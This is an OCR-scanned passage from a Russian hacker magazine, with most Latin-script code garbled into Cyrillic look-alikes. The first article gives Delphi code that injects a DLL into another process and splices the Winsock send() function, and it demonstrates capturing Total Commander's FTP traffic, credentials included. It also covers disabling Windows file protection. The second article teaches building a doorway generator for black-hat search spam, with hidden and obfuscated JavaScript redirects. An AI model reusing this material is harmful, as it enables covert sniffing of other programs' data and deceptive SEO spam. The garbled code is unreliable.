вернуть все на место). Для перехвата функций, экспортируемых из 066 в 
текущем процессе, предусмотрена отдельная функция: 

Гипс б іоп НоокРгос ( ІрМоЬиІеЫаше , ІрРгосЫаше: РСЬаг; 
ЫемРгос: роіпбег; ѵаг ОІЬРгос: роіпбег) : Ьооіеап; 
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Входных параметров четыре: 1 . Имя модуля (ОІ_І_). 2. Имя функции; будь 
внимателен, регистр в указании имени функции играет роль. 3. Указа- 
тель на функцию-замену. 4. Адрес к оригинальной функции. 
Перехватывать функцию без передышки не имеет смысла, поэтому 
рано или поздно нужно останавливать процесс перехвата. Для этого в 
АдѵАріНоок реализована функция ЦпІіоокСосІе ( ) , которая в качестве 
единственного параметра принимаетуказатель на адрес моста кориги- 
нальной функции. 

3. Полезные функции. Помимо необходимых функций для перехвата АРІ 
или внедрения кода, в модуле есть несколько функций, которые обяза- 
тельно пригодятся системным программистам. 

• Отключение защиты системных файлов. В ОС ѴѴіпсіоѵѵб, базирующихся 
на ядре ІЧТ, нельзя просто взять и изменить системные файлы — защита 
Бувіет Рііе Ргоіесбоп трогать их не даст. Для решения этой задачи в 
модуле определена функция ОізаЫеЗРС ( ) . Передавать параметры ей 
не требуется. В качестве результата возвращает булевское значение. 

• Завершение процесса через режим отладки. Наверняка, ты сталки- 
вался с процессами, которые тяжело «убить». Стандартные функции 



вроде ТегтіпаІеРгосеезз () не помогают. Для устранения про- 
блемы принято использовать так называемые отладочные функции. 
Сначала процесс переводится в отладочный режим, а потом уничто- 
жается. Таким образом можно завершить практически любой «вред- 
ный» процесс. Автор АбѵАріНоок реализовал простую надстройку для 
завершения процесса через отладочный режим: 

бипсбіоп ВеЬидКіІІРгосезз (Ргосеззісі: сЫогсі) :Воо1еап; 

В качестве единственного параметра функции нужно передать рісі процес- 
са. В случаеуспешного завершения процесса функция вернет ігие. 
Довольнотеории, пора переходить к практике. Сейчас я расскажу, как 
написать приложение для перехвата функции зепсі ( ) .Для начала создай 
в Оеірбі новый проект и нарисуй форму, хотя бы отдаленно похожую на мою. 
Какзакончишьтворческую часть, вставляй наш СѴО-диск, копируй с него 
модул ъАдѵАріНоок и немедленно подключай к своему проекту. 

Первое, что необходимо сделать — научить программу получать спи- 
сок всех запущенных процессов и их дескрипторов. Все данные будут 



Код БЫ 

ІіЬгагу ргозесДІ; 

изез Міпсісжз , абѵАріНоок, Меззадез, ЗузБСіІз; 

Суре 

ТЗоскеС^іпбедег ; 

ТЗепсІРгосесІиге^бипсСіоп (з: ТЗоскеб; ѵаг Виб; 
Іеп, біадз: ІпСедег) : ІпСедег; збсісаіі; 



_рОІсІЗепс1: ТЗепбРгосебиге; 
_Ьіпзб, _Ь.:іпСедег; 



ргосеЬиге ЗепбВаба (баба : збгіпд; бипсТуре : іпбедег ; 
Вибб :роіпбег ; Іеп: іпбедег ) ; 

ѵаг 



б : ТСоруБабаЗбгисб ; 

Ъедіп 

сазе бипсТуре об 
10 : 

Ьедіп 

б.ІрБаба := Вибб; 
б.сЬБаба := Іеп; 
б.бтмБаба := 10; 



епб; 

30: 

Ьедіп 

б.ІрБаба := рсЬаг(баба) ; 
б.сЬБаба := ІепдбЬ (баба) ; 
б.бмВаба := 30; 



епб; 



епб; 

ЗепбМеззаде (_Ь, ММ_СОРУВАТА, 0, Ьопдіпб (@б) ) ; 



Епб; 



бипсбіоп х5епб(з: ТЗоскеб; ѵаг Виб; 

Іеп, біадз: Іпбедег): Іпбедег; зббсаіі; 

Ьедіп 



ЗепбБаба ( ' ' , 10, аббг ( збгіпд (Ьиб) ) , іеп); 
гезиіб : =_рОІбЗепб ( з ,Ьиб , Іеп, біадз) ; 

епб; 

ргосебиге ВБЬЕпбгуРоіпб (бѵбЗеазоп : БМогб) ; 

Ьедіп 

сазе бѵбЗеазоп об 

ВБЬ_РВОСЕЗЗ_АТТАСН : 

Ьедіп 

ЗепбБаба ( ' Библиотека загружена . Начинается под- 
готовка к перехвату. . . ' , 30, піі, 0) ; 

_Ь.іпзб : =ОебМоби1еНапб1е (піі) ; 

ЗборТЬгеабз ; 

НоокРгос ( 1 ѴІЗ 2_32 .111' , ' зепб ' , 

0x3 епб, @_рО 163 епб) ; 

ЗепбБаба ( 'Подмена функций завершилась успехом! ' , 
30, піі, 0) ; 

ВипТЬхеабз ; 

епб; 

ВБЬ_РВОСЕЗЗ_ВЕТАСН : 

Ьедіп 

ЗепбБаба ( 'Снимаем перехват. . . ' , 30, піі, 0); 
ШбюокСобе (@_р01бзепб) ; 

епб; 

епб; 

епб; 



Ьедіп 

_1і: =біпбш.пбоѵ\? (піі , 'МіпЗоск Зпіббег' ) ; 

іб (_Ь = 0 ) бЬеп 

Ьедіп 

МеззадеВох ( 0 , 'Не найдено окно клиентской части 
программы! ' , 'Ошибка! ' , 0) ; 

ЕхібТЬгеаб ( 0 ) ; 

епб; 

ВІІРгос := @ВЫ.ЕпбгуРоіпб ; 

ВЬЬЕпбгуРоіпб (БЬЬ_РКОСЕЗЗ_АТТАСН) ; 

епб. 
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Смотрим таблицу импорта 



отображаться в компоненте ЬізІѴіеѵ?. Именно из этого списка мы 
будем выбирать процесс-жертву. Для получения списка текущих про- 
цессов существует несколько способов. Рассмотрим наиболее простой 
из них — использование модуля ѢІНе1р32 , входящего в стандартную 
поставку ОеІрЬі. Ради получения процессов я завел отдельную про- 
цедуру — ОеІАІІРгосезз ( ) . Ее код ты увидишь на врезке. В самом 
начале процедуры я вызываю функцию ЕпаЫеБеЬидРгіѵіІіде ( ) . 
Функция эта самописная и ее вид ты можешь посмотреть, открыв 
исходники с диска. Скажу лишь, что она требуется для получения 
отладочных привилегий. С ними появляется возможность получать 
Ъапсііе даже у системных процессов. Если функция вернула іаізе, то 
я просто сообщаю об этом в лог и продолжаю выполнение процедуры. 
Получение списка процессов сводится к нескольким шагам. Первый 
этап знаменуется использованием АРІ функции СгеаІеТооІНе1р32 
ЗпарЗЬоІ () . Она получает снимок объектов, определенных в первом 
параметре. Я указал константу ТН32СЗ_ЗЫАРРК0СЕЗЗ, которая 
подразумевает получение снимка одних лишь процессов, так как для 
сегодняшнего примера этого вполне достаточно. Помимо процессов 
ты можешь получить: 

• ТН32С5_5ЫАРТНКЕАБ — СНИМОК ПОТОКОВ; 

• тнз 2С5_5 ЫАРМОБШііЕЗ 2 — список загруженных модулей; 

• тн32СЗ_8ЫАРАЬЬ — включает в снимок все процессы, модули, потоки. 
Если функция СгеаЬеТоо1Не1р323парЗЪ.оЬ () выполниласьуспешно, 
значит, нужно пробежаться по списку полученных объектов и вывести их в 
ЬізІѴіеы. Для «пробежки» я использую функции Ргосезз32ЕігзІ ( ) и 
Ргосезз32Ыехѣ ( ) . Параметры у обеих функций одинаковые: 

1. Снимок объектов, который был получен в результате СгеаІеТооІН 
е ІрЗ 2 ЗпарЗЬоі: () . 2. Структура типа ТРгосеззЕпІгу32, в кото- 
рую будетзаписана информация о каждом найденном объекте. После 
выполнения Ргосезз32ЕігзЬ ( ) в переменную, которую мы указывали 
во втором параметре, будетпомещена информация о первом процессе 
из снимка. Для перехода к следующему процессу вызывается функция 
Ргосезз32ЫехЬ ( ) . 

Итак, списокпроцессовунасесть. Повесь вызов ЗеЪАІІРгосезз () на 
событие ОпСгеаІе формы и запусти программу. Если ты не допустил в лис- 
тинге ошибок, то после запуска ЬізѣѴіем должен заполниться списком 
процессов. 

^ ДЕЛАЕМ ЗАХВАТ 

Теперь, когда у нас есть список процессов, можно приступать к реали- 
зации самой главной части — перехвату функций. Перехватывать их 
удобнее всего из библиотеки 0І_І_. Принцип такой: внедряем библио- 
теку в чужой процесс и методом сплайсинга делаем перехват. Сейчас 



все кажется сложным и запутанным, но на деле все просто. Создавай в 
ОеІрЫ новый проект типа ОІ_І_ и потихоньку перекатывай в него бездуш- 
ные строчки кода из врезки «Код ОІ_І_». 

Рассматривать приведенный код лучше всего с процедуры 
РЬЬЕпкгуРоіпі . Именно в ней происходит реакция на события, 
связанные с 0І_1_ (загрузка/выгрузка библиотеки). Во время загрузки 
библиотеки возникает событие ОЬЬ_РРОСЕЗЗ_АТТАСН. Для нас это 
знак кустановке перехвата. Перед тем, какустановить его, я отправляю 



Та самая процеду- 
ра СесАПРгосеззО 

ѵаг 

_5парЬізД : ТНапЫе; 

_РгосЕпДгу : ТРгосеззЕпЦгу32 ; 

Ьедіп 

іТ Ж)Т (ЕпаЫеБеЬидРгіѵіІеде ( ) ) Тііеп 
Ьедіп 

геЬод. ЗеІАЦЦгіЬибез .Соіог := сІМагооп; 
геЬод . Ьіпез . АсІЪ ( 'Не удалось получить привилегии 
отладчика! ' ) ; 

епс5; 

ІѵРгосеззЬізІ: . Ііешз . Сіеаг ; 

_РгосЕпЬгу . сІмЗіге := ЗігеОі (ТРгосеззЕпДгу32 ) ; 
_ЗпарЬізР := СгеаЦеТооІНе1р323парЗЬоЦ ( 
ТН32СЗ_ЗЫАРРКОСЕЗЗ, 0) ; 

іі (Ргосезз32Рігз1: (_ЗпарЬіз1: , _РгосЕпЦгу) ) ТЬеп 
Ьедіп 
НереаЦ 

міСЬ. ІѵРгосеззЬізб . Іііешз . АскЗ Бо Ьедіп 

Сарбіоп : =ІпЦТоЗЦг (_РгосЕпЦгу . ДЬ32РгосеззЮ) ; 
ЗиМБетз . АскЗ (ЕхДгасСРіІеЫаше ( 

_РгосЕпДгу . згЕхеРіІе) ) ; 

епсі; 

ШЦіІ поД (Ргосезз32ЫехД (_ЗпарЬізД , 

_РгосЕпДгу ) ) ; 

епсі; 

СІозеНапЫе (_ЗпарЬізД ) ; 

епсі; 
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Форма нашего перехватчика 

клиенту (основному приложению) информацию о текущей ситуации. 

В своем примере я передавал целые строки, но на практике лучше 
отправлять коды событий/ошибок, определить которые можно заранее. 
Процесс передачи инфы из ОІ_І_ в основную программу осуществляется 
с помощью самописной функции ЗепсІРаІа ( ) .В теоретической части 
статьи я описывал минусы перехвата методом сплайсинга. Какты пом- 
нишь, они заключались в потоках. Решение проблемы также было озву- 
чено — это временная остановка всех потоков. Для остановки потоков 
чужого процесса в модуле Ад. ѵАРІНоок есть функция ЗІорТЪгеасіз ( ) . 
Параметров она не требует. Остановив потоки, можно устанавливать 
перехват. Для этого я использую функцию НоокРгос ( ) . В качестве 
параметров передаю ей: 

1. Имя библиотеки, в которой объявлена перехватываемая функция. Пос- 
кольку в примере меня интересовала лишь функция зепсі ( ) , то я указал 
Ю2_32 . 611 (именно в этой библиотеке определены все функции второй 
версии ѴѴіпБоск АРІ). 

2. Название функции. В примере я указал «зепсі». Это самая распростра- 
ненная функция для отправки данных по сети, ее используют практически 
все приложения. Обрати внимание на регистр, используемый в написании 
имени функции. Имя функции полностью состоит из маленьких букв. Не 
обратишь на это внимание — попадешь на отладку таинственных ошибок 
«Асеева Ѵіоіабоп». 

3. Указатель на функцию подставы. В качестве функции подставы в моей 
библиотеке определена функциях/? ел с? ( ) . 

4. Указатель на переменную, для сохранения моста коригинальной функ- 
ции. Я указываю здесъ_р01с13епс1. 

После выполнения НоокРгос ( ) втекущем процессе вместо функции 



Обработчик 

ОпОіскО 

_Ъ := ОрепРгосезз (РР.ОСЕ85_АЬЬ_АССЕ55, баізе, 
ЗСгТоІпС ( ІѵРгосеззЬізІ: . Зеіескесі. СарСіоп) ) ; 
_с!1ІРаЫі := ЕхРгасДРіІеРаЫі ( РагашЗбг ( 0 ) ) + 

1 ДезД . сан ' ; 

Іг^есбБІ! (_]!, рсЪаг (_с11ІРа1:1і) ) ; 




Программа в действии 

зепсі ( ) будетвызыватьхзелй ( ) . Целью статьи было показать, как можно 
перехватывать данные, передаваемые каким-либо сетевым приложением, 
поэтому в подставной функции я просто передаю буфер с данными. Таким 
образом, мы получаем то, что хотели, а приложение-жертва, ни о чем не 
догадываясь, продолжает выполнять свою работу. Установив перехват, 
нужно запустить остановленные ранее потоки. Для восстановления работы 
потоков я использую функции КипТЪгеасІз ( ) , которой также не требуются 
параметры. 

Н ТЕСТИРУЕМ 

Можно считать, что простейший пример перехвата сетевых функций готов. 
Точнее, реализован процесс перехвата одной лишь функции — зепс!() . 
Перехват остальных ты сможешь реализовать самостоятельно, тем более 
что принцип будет полностью таким же. Перед тем, как мы начнем тести- 
ровать, откомпилируй библиотеку и вернись к нашему основному проекту. 
Создай обработчик события ОпСІіск ( ) для кнопки, по нажатию которой 
мы будем внедрять библиотеку, и перепиши в него код из врезки «Обработ- 
чик ОпСИскО». Я не буду расписывать этот код целиком, так как в нем нет 
ничего сложного. Все, что там происходит— получение ЬапсИе процесса 
по его рісі и внедрение созданной нами библиотеки с помощью функции 
Іп^есЬБИ () , описание которой я уже приводил. 

В качестве теста я решил перехватить данные, которые отправляет всем 
известный ТоІаІСоттапсІег при соединении с РТР сервером. Внедрив 
нашу хакерскую библиотеку в процесс іоіаістсі. ехе и запустив в 
Тоіаі Соттапсіег’е процесс соединения с РТР сервером, я наблюдал, 
как лог начал заполняться командами протокола РТР. Поскольку этот 
протокол не является безопасным, то все важные данные, передавае- 
мые серверу, были успешно перехвачены. Результат ты можешь увидеть 
на рисунке. 

г все готово 

В простейшем примере я показал перехваттолько функции зепсіО. Тем не 
менее, сетевой набор ѴѴіпБоск АРІ содержити другие функции для отправки 
данных, а значит, у тебя есть полигон для новых испытаний. Не ленись 
ставить различные эксперименты, ведь только путем проб и ошибок можно 
решить любую задачу. Еслиутебя возникли вопросы или предложения,™ 
милости прошу, я всегда открыт для общения. Ах, да, чуть не забыл. После 
выхода журнала в свет, на сайте ѵѵѵѵѵѵ.ѵг-опііпе.ги я выложу исходники, в 
которых будут реализованы примеры перехвата других АРІ функций. Обяза- 
тельно их скачай! ЗЕ 
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г ВВЕДЕНИЕ ДЛЯ ЧАЙНИКОВ 

Очень кратко о генерации дорвеев для тех, кто еще не в теме. Итак, дорвей 
(сіоогѵѵау) или просто дор. Это веб-страница, через которую можно попасть 
на другие страницы того же или другого сайта. Если ты застал зарождение 
рунета, то наверняка помнишь, что большинство веб-сайтов открывались 
со страницы, не содержащей ничего, кроме заголовка, фуфлыжной кар- 
тинки и иногда ссылок на различные версии сайта под разные кодировки. 

В те времена поддержка нескольких кодировок в рамках одного браузера 
была большой проблемой, не говоря уже об автоматическом определении 
кодировки. Эта страница и есть сіоогѵѵау. КПД был ниже уровня плинтуса. 
Для чего она тогда? А ни для чего :). Просто, так было модно, тенденции веб- 
дизайна, знаете ли. 

Каким боком здесь участвует поисковая оптимизация? Подогнать под осо- 
бенности конкретного поискового движка только одну страницу и вывести 
ее втоп гораздо проще, чем выводить весь ресурс. Азаполучив страницу в 
топах по определенным запросам, можно направлять с нее пользователей 
на другие страницы ресурса. Продолжим фантазировать. Выведя втоп та- 
кую страницу по очень популярному среди юзверей запросу, можно поиметь 
неслабыйтрафик. И опять-таки, переправить по ссылкам на другие страни- 
цы своего ресурса. Или не переправить, а заработать, разместив в дорвее 
ссылки на проплаченные ресурсы. Так мы постепенно превращаемся из веб 
дизайнера-бессребреника в матерого продавца поискового трафика. 
Продавать трафик можно либо самостоятельно, либо через посредников, 



что гораздо выгоднее. Но выбиться втоп по высокочастотному запросу и, 
тем более, удержаться там — задача не изтривиальных. Куда проще занять 
верхние позиции по низкочастотным запросам. Увы, по та кому за просу и 
посетителей к нам придет гораздо меньше. Следовательно, на продаже 
трафика мы срубим меньше капусты. 

Выход? Окучивать как можно больше низкочастотных запросов, создавая 
под каждый из них свой дор и выводя его втоп ЭЕРРа. Чем больше доров, 
тем больше лавэ — зависимость прямая, кактрамвайная шпала. Есть, 
правда, один вопрос, который может не давать спокойно спать будущему 
сетевому олигарху. «А что, если пользователь, зайдя на сіоогѵѵау, сбежит 
оттуда, не перейдя ни по одной ссылке?». Правильный вопрос, потому что 
юзверь сейчас пошел тертый, пуганый и куда попало, его не заманишь. Да 
и не надо. Потому что у нас есть такое чудо, как автоматический редирект 
(исполненный чаще всего в виде сценария на языке ЭаѵаЗсгірІ:], перекиды- 
вающий пользователя к клиенту, проплатившему трафик еще до того, как 
браузер успеет показать содержимое дора. 

Воттакая незамысловатая технология. Однако тут, каки влюбом другом 
деле, не обойтись без нюансов. Их мы и обсудим. 

Н АСНТ1Ж0! ГРАБЛИ! 

Первое, что необходимо знать начинающему заводчику доров — эта техно- 
логия всеми поисковыми системами относится ктак называемой «черной 
оптимизации». То есть к методам, которые расцениваются как нарушение 
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правил игры и безжалостно караются системой модерации поисковиков. 
Если твой дор спалили, то он не только навсегда вылетает из топа, ноиза- 
носится в черный список поискового индекса, зарабатывая пожизненный 
бан. Надо сказать, поисковики весьма преуспели в борьбе с дорвеями и 
валят их пачками. Отсюда безрадостный вывод — мало того, что для прием- 
лемого дохода необходимо иметь не один дорвей, а целую ихсеть.такеще 
и создание дорвеев представляет собой непрерывный процесс. Короче, 
сизифовтруд. Взамен попавших в бан приходится постоянно создавать и 
выводить в топ новые доры. 

Вторая проблема заключается в том, что, несмотря на заявления некото- 
рых безответственныхтоварищей, редирект, даже выполненный в виде 
ЭаѵаЭсгірІ: сценария, успешно палится практически всеми поисковиками, и 
страница с редиректом опять-таки летит в бан. Одно из решений проблемы 

— шифрование редиректа. Алгоритмы составления поискового индекса 
постоянно обновляются, в том числе и совершенствуя методы борьбы с чер- 
ной оптимизацией. Следовательно, приемы редиректа также нуждаются в 
постоянном обновлении. 

г И ТУТ ПОЯВЛЯЮСЬ Я — ВЕСЬ ТАКОЙ В КРАСНОМ 

Конечно же, читатель догадался, кто у нас сегодня в роли супермена. Это 

— дорген, программа, основное назначение которой заключается в авто- 
матизации рутинного и однообразного труда по быстрому и эффективному 
созданию дорвеев сучетом особенностей поисковых алгоритмов. Каким 
требованиям должен удовлетворять дорген? Что он должен уметь делать 
обязательно, а что является всего лишь данью моде? Ответы на эти вопросы 
должен знать не только тот, кто собрался написать собственный дорген, но и 
тот, кто решился на его покупку. Ниже автор постарался привести наиболее 
полный список возможностей доргена. Тем не менее, не стоит думать, что 
это исчерпывающий список. Как и не стоит пытаться реализовать сразу 
все опции. Наиболее эффективный подход — выбрать важный (на данный 
момент данному пользователю] функционал и его реализовать. В после- 
дующих версиях можно будет наращивать возможности. Итак, перечень 
функциональных возможностей профессионального доргена включаетв 
себя: 

• стилевое выделение ключевых слов; 

• использование тегов <Ь> и <зѣгопд>\ 

• использование заголовков разного уровня; 

• использование тегов <Ьі 11е>, <(2езсгірііоп>, <кеуѵюг6.з>\ 

• возможность выбора шаблона оформления генерируемых страниц; 

• управление алгоритмами внешней и внутренней перелинковки генери- 
руемых страниц; 

• управление количеством страниц, входящих в один дорвей; 

• управление объемом контента; 

• возможность выбора источника контента для генерируемых страниц; 

• наличие генератора цепей Маркова; 

• возможность управления плотностью ключевых слов; 

• возможность поиска ключевых слов и подбора поисковых 
запросов; 

• управление используемыми алгоритмами редиректа; 

• возможность шифрования и обфускации программного кода; 

• управление списком фидов; 

• возможность автоматической загрузки доров на веб хостинг; 

• правильное расположение редиректа (вверху страницы] неза- 
висимо от используемого шаблона; 

• возможность использовать ключевые слова в ІІПІ_ страницы; 

• автоматическая перелинковка довеев, загружаемых из про- 
граммы на разные хостинговые площадки; 

• возможность импортирования списка ключевых слов из 
файла; 

• функции транслитерации, перевода ключевых слов и управле- 
ния опечатками; 

• возможность сокрытия поискового спама; 

• управление частотой использования тегов оформления на 
странице. 

Список, как видишь, впечатляет. Дорген, обладающий подобной 
функциональностью, стоит не один килограмм зелени. У тебя же, 



при условии прямых рук, есть реальная маза сделать его самостоятельно. А 
там уже, как говорится: «Хочешь, ешь морковку, хочешь по-другому исполь- 
зуй»(©Фаина Раневская]. Хочешь — доры клепай, хочешь — доргеном сво- 
им барыжничай. Если смысл некоторых из перечисленных функций тебе не 
понятен — это лишний шансуглубить свои познания в области поисковой 
оптимизации. Ссылки интересных ресурсов я тебе накидал (смотри врезки]. 

^ С ЧЕГО НАЧАТЬ? 

Именнотакой вопрос задает большинство тех, кто решил написатьсвой 
собственный приватный мегарулезный дорген. Вопрос часто не находит 
ответа, а дорген так и остается ненаписанным. Сейчас мы вместе преодоле- 
ем этот психологический барьер. 

Прежде всего, определяйся стой минимальной функциональностью, 
которая тебе нужна. Не увлекайся и выбери действительно критический 
минимум, который и будет отличать будущий софт от, скажем, блокнота или 
СО Еіесіог’а :]. 

Навороты можно добавлять постепенно, имея на рукахуже функционирую- 
щий дорген и используя его в своих грязных и не очень делишках. Короче, 
кури методологии итерационной разработки ПО. 

Функциональность для первого раза будет минимальной — выбор ключе- 
вых фраз, шаблона, исходного текста, частоты ключевиков и количество 
страниц, генерируемых под каждую ключевую фразу. 

Интерфейс можешь построить, каку меня — или придумать свой вариант. 
Список ключевых фраз будет храниться в обычном текстовом файле. В 
качестве разделителя — перевод строки (одна строка — одна ключевая 
фраза]. Если не вдаваться в детали, алгоритм работы нашего доргена 
будут следующим. Пользователь предварительно готовит файл с ключе- 
выми фразами и файл с шаблоном НТМІ_-верстки. Затем в окне доргена 
указывает все необходимые параметры (путь кфайлу с ключевиками, путь к 
файлу с шаблоном, количество страниц в одном доре, плотность ключевых 
слов, каталогдля сохранения результата). Начинается главное действо. 
Прога перебираетсписок ключевиков, считаетобщее количество слов в 
заготовленном текстовом материале, рассчитывает количество вхождений 
ключевика в текст на основе заданного показателя плотности и в случай- 
ном либо заданном порядке помещает ключевые фразы в исходный текст. 
Вставляем получившийся текст в НТМІ_-шаблон в соответствии с заранее 
подготовленной разметкой. Добавляем теги <Ше>, <ЬеасІ> и сохраняем 
получившийся файл. Повторяем для каждой ключевой фразы заданное 
количество раз. 

Финт №1 . Когда дело дойдет до сохранения на винте готового дорвея, 
разумным шагом будет назначить ключевую фразу, под которую оптими- 
зировалась бы страница в качестве имени файла. Это прибавитей вес при 
оценке релевантности. 

Финт №2. Сохраняя файл с дором, заточенным под ключевую фразу из двух 
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и более слов, в названии файла эти слова лучше разделять с помощью 
дефиса, а не нижнего подчеркивания, как привыкли многие кодеры. 
Причина проста: поисковики расцениваютдве лексемы, объединенные с 
помощью нижнего подчеркивания как одно слово (которое может оказаться 
поисковику неизвестным), вто время каксоставное слово с использовани- 
ем дефиса прекрасно распознается как два отдельных слова. 

Теперь о шаблоне. Это обычный шаблон НТМІ_-документа, каких в сети до 
фига и больше. Можешь выбрать тот, что тебе нравится. Автору приходилось 
сталкиваться с двумя подходами к организации НТМІ_-шаблонов в доргене. 
Первый — шаблоны, жестко прописанные в доргене. Выбор фиксирован 
и невелик. Второй — возможность использовать любые НТМІ_-файлы в 
качестве шаблона (с предварительным добавлением туда специальной 
разметки). Разметка представляет собой набор известных доргену ключей, 
по которым он в процессе разбора шаблона узнает, какой элемент нужно 
вставить в этом месте. Например: 

{ТЕХТ} — основной текст 
{ЗСК.ІРТ} — 63 скрипт редиректа 
{МАШ_КЕУЖЖБ} — кейворд страницы 
{ КАМ_КЕУЖЖБ } — случайный кейворд 

И так далее. Кстати, пример разметки взят с сайта ѵѵѵѵѵѵ.кіікіюгит.сот . где 
ты можешь расширитьсвои знания потеории дороводства. 

Недостаток подхода в том, что мы привязываем логику работы доргена к 
конкретному шаблону, жестко прописывая, где и что должно находиться. Я 
советую тебе поступить иначе: обозначить в шаблоне основные его секции, 
а что в какой секции размещать — пусть решает программа с помощью 
заложенных в нее алгоритмов. В простейшем шаблоне секций будет не 
так много — заголовок, текст, навигация, подвал. В более сложном можно 
расширить список. 

Нюансы мы обсудили. Пора приниматься за работу. 

г МУКИ ТВОРЧЕСТВА 

Начнем с загрузки списка ключевых фраз. Для этого хорошо подойдет 
элемент управления сЪескесІЫзІВох. От простого списка он отличается 
возможностью выбора элементов с помощью чекбоксов. Заполняться спи- 
сок будет при нажатии соответствующей кнопки. Обработчик, я бы сказал, 
не прост, а тривиален: 

БіаІодКезиІб гезиіб = біІеСІюозег . ЗЪсжБіаІод ( ) ; 

Збгіпд біІеЫате; 

іб (гезиіб == БіаІодКезиІб .Сапсеі) гебигп; 
біІеЫате = біІеСІюозег . РіІеЫате; 
іб (біІеЫаше == "" II біІеЫаше == пиіі) 

МеззадеВох. ЗЬ.оѵ7 ( "Ошибка выбора файла" , "Еггог" , 
МеззадеВохВиббопз .ОК, МеззадеВохІсоп. Еггог) ; 
еізе { 

іприб = пем ЗбгеатКеабег ( біІеЫате) ; 
такеКеуЬізб ( ) ; 

} 



Смысл написанного выше — вывести диалог открытия файла, коррект- 
но обработать возможные ситуации и передать управление функции 
такеКеуЫзѣ ( ) . 

ргіѵабе ѵоіб такеКеуЬізб ( ) { 

Збгіпд а = пиіі; 
ѵбіііе (! іприб . ЕпбОбЗбгеат) { 
а = іприб . КеабЬіпе ( ) ; 

іб (а !=пи11) сЪескебЬізбВохІ . Ібетз . Абб (а) ; 

} 

іприб . Сіозе ( ) ; 

} 

Другими словами, читаем файл до одурения (до ЕпсЮИЗкгеат} и подсовы- 
ваем строчки компоненту сЬескебЫзѣВох. 

Аналогичным образом обрабатываем ввод остальных параметров (подроб- 
ности смотри в исходниках на диске). После того, как в листбокс загружен 
список ключевых фраз, нужно реализовать механизм выбора отдельных 
ключевиков, для которых будут создаваться страницы: 

ргіѵабе ѵоіб с1іескебЬізбВох1_ІбетСІіеск (ок^есб зепбег, 
ІбетСкескЕѵепбАгдз е) { 

Збгіпд ібеш = 

скескебЬізбВохІ . Зеіесбебібет. ТоЗбгіпд ( ) ; 
іб (е .ЫемѴаІие == СЬескЗбабе . СЬескеб) аббКеу ( ібет) ; 
еізе гешКеу(ібеш) ; 

} 

ргіѵабе ѵоіб аббКеу (Збгіпд ѵаі) { 

іб (кеуЬізб == пиіі) кеуЬізб = пей АггауЬізб (1) ; 
кеуЬізб . Абб (ѵаі) ; 

} 

ргіѵабе ѵоіб гешКеу (Збгіпд ѵаі ) { 
кеуЬізб . Кепюѵе (ѵаі ) ; } 

Думаю, все понятно — ключевики, выбранные для дальнейшего исполь- 
зования, храним в списке кеуЬізб. Реагируем на действия пользователя 
через событиеіУеіѵУаіие. Поскольку дикий юзверь непредсказуем и может 
жать на чекбокс не только с целью выбрать ключевую фразу, но и отменить 
свой выбор, предусмотрена реакция на оба действия — методы аббКеу () и 
гетКеу ( ) . 



Много вопросов вызывает перелинковка страниц дорвея и создание 
сети из нескольких дорвеев. На этот счет не существует однозначного 
мнения. Используют как простенькие элементарные схемы, таки 
сложные, основанные на математическом аппарате, использующие 
динамическую или кольцевую перелинковку. Первое время можно 
отталкиваться от идеи оформления связей в виде навигационного 
блока. 
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Обработав все элементы пользовательского интерфейса, дор- 
ген находится, что называется, на взводе и готов выстрелить. 
Создание дорвеев представляет собой последовательный 
процесс. Ниже я перечислил его основные этапы: 

1. Читаем втекстовую переменную НТМІ_-шаблон; 

2. Читаем втекстовую переменную текст дора; 

3. Читаем втекстовую переменную текст редиректа; 

4. Перебираем в цикле ключевики; 

4.1. Для каждой ключевой фразы рассчитываем количество 
повторов; 

4.2. Формируем заголовки; 

4.3. Разбавляем основнойтекст ключевыми фразами; 

4.4. Парсим шаблон, заменяя метки соответствующими 
элементами; 

4.5. Генерируем имя и сохраняем НТМІ_-документ. 

Исходный текст этого алгоритма слишком объемен, чтобы его 
публиковать вжурнале, поэтому изучай исходник, выложенный 
на диске. Остановимся на реализации основных моментов. 

Для формирования содержимого дора необходимо исходный 
текст разделить на отдельные лексемы (слова) и посчитать 

их общее количество. Исходя из заданной пользователем 
плотности, рассчитываем количество повторов ключевой 
фразы или слова. Теперь, зная количество повторов фразы в 
тексте, нужно ее там разместить. Будетуместным использо- 
вать алгоритм, позволяющий получить текст, наиболее точно 
соответствующий естественному. Не будем ничего усложнять 
— наша цель освоить общую концепцию создания доргенов. 
Обойдемся обычным равномерным распределением потексту. 

Зкгіпд [ ] Іех = сопСепС . Зріір ( ) ; 
іи:: ІехСоигЩ = 1ех.ЬепдЕ]і; 
іпС кеуТоРаІАшоипІ: = (іпЬ) 

(пишегісІІрВоѵт2 . Ѵаіие / 100 * ІехСоипС) ; 

ІГ (кеуТоРаІАшоипІ: != 0) { 

іпС зкер = (іпк) (ІехСоипк / кеуТоРаІАшоипІ: ) ; 
Гог (іпГ к = 0; к <= кеуТоГаІАлюипГ ; к+ + ) { 
іі (зРер <= Іех.ЬепдЫі) { 



1ех[зРер] = (ЗГгіпд) кеуЬізР [і] ; 
зРер += зРер; 

} 

} 

} 

Несколько комментариев! Для разделения строки на отдель- 
ныелексемы используется метод Зрііѣ О , возвращающий 
массив лексем. Вычисляя количество вхождений ключевика 
в текст, не забудь привести результат к целочисленному 
значению. 

Кактолько текст будущего дорвея сформирован (кстати, на этом 
этапе неплохо дополнительно предусмотреть вставку тегов 
<Ь>, <і>, <Ь>), работаем с ключевой фразой для повышения 
значимости ключевика. Думаю.ты справишься самостоя- 
тельно. Чтобы вставить в соответствующие позиции шаблона 
нужные элементы, можно прикрутить стандартную функцию 
РерІасеО, которая заменяет один фрагмент те кета другим: 

РешрІаРе = Решрі . Керіасе 

( " #РіРІе" , (ЗРгіпд) кеуЬізР [і] ) ; 

РешрІаРе = РешрІаРе .Керіасе 
( "#1іеас1ег" , Ъеасіег) ; 

РешрІаРе - РешрІаРе .Керіасе 
( " ігесіігесР " , гесііг ) ; 

ЗРгіпд пемТехР = " " ; 

Гог(іпР к = 0; к < Іех.ЬепдРЬ.; к++) 
пеѵ/ТехР = пеѵ?ТехР + " " + Іех [к] ; 

РешрІаРе = РешрІаРе . Керіасе 
( " #РехР " , пемТехР ) ; 

Все, дор готов. Осталось записать его в отдельный файл, 
повторить перечисленное выше н-ное количество раз в соот- 
ветствии с количеством страниц дорвея, указанным пользова- 
телем, и перейти кследующей ключевой фразе. 

Не забудь присвоить каждому файлу уникальное имя, пра- 
вильное сточки зрения поисковой оптимизации (включающее 
в себя ключевую фразу). 

^ ГОНКА ВООРУЖЕНИЙ 
